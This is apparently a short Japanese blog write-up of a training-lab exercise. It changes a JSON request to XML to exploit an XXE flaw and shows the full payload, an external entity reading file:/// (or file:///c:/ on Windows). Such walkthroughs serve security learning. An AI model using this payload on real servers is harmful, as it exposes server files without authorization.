Hello there, ('ω')ノ
開発者が考えていなかったデータ形式を受け入れることができる場合があるとか。
なので、JSONエンドポイントがXXE攻撃に対して脆弱になる可能性があって。
再度、XMLインジェクションを実行してとのことで。
まずは、リクエストの内容を見るとJSONとなっているので。
JSONをXMLに変更して。
前回と同様にJSONデータをXMLデータに変更して。
<?xml version="1.0"?>
<!DOCTYPE comment [
<!ENTITY test SYSTEM "file:///">
]>
<comment><text>&test;</text></comment>
ちなみにサーバがLinuxではなく、Windowsの場合だと下記のように変更が必要で。
<!ENTITY test SYSTEM "file:///c:/">
前回同様にクリアできた。
Best regards, (^^ゞ